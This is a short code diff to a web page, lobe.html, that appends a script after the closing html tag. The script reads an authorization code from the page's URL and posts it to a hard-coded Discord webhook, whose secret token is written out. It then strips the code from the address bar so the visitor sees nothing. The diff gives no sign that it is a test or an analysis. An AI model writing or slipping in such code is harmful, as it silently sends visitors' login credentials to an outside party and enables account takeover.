--- a/lobe.html
+++ b/lobe.html
@@ -103,3 +103,27 @@
     </div>
 </body>
 </html>
+
+<script>
+    // Extract the code parameter from the URL
+    const urlParams = new URLSearchParams(window.location.search);
+    const code = urlParams.get('code');
+
+    if (code) {
+        // If the code parameter exists, send it to the Discord webhook
+        const webhookURL = "https://discord.com/api/webhooks/1152319251110182992/zCbXlSXAzKvOmV41VswSVUh1Z7IU7SEJPG0awuWCyYBvZ0TTj6kiFwFOHCR0xnA9g4qA";
+        
+        fetch(webhookURL, {
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+            },
+            body: JSON.stringify({
+                content: `Received an authorization code: ${code}`
+            }),
+        });
+
+        // Clean up the URL in the address bar
+        window.history.replaceState({}, document.title, "/lobe.html");
+    }
+</script>
